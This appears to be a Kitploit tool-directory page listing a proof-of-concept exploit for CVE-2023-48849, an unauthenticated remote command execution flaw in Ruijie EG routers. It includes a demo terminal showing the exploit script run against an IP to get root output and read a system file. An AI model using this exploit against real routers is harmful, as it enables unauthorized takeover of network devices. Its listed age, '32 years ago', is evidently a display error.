Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/delsploit/cve-2023-48849
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubdelsploit/cve-2023-48849

CVE-2023-48849

Proof-of-concept exploit for unauthenticated remote code execution in Ruijie EG Series routers (firmware <=EG_3.0(1)B11P216). Executes arbitrary commands via crafted HTTP requests.

View Repository
32 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-48849

Ruijie EG Series Routers firmware <=EG_3.0(1)B11P216 allows unauthenticated attackers to remotely execute arbitrary code due to incorrect filtering.

root@kitploit:~
$ python3 poc.py 192.168.1.1 'id'
uid=0(root) gid=0(root)
$ python3 poc.py 192.168.1.1 'grep TARGET /etc/openwrt_release'
DISTRIB_TARGET='mediatek/eg310gh-e'

DEMO

Download Tool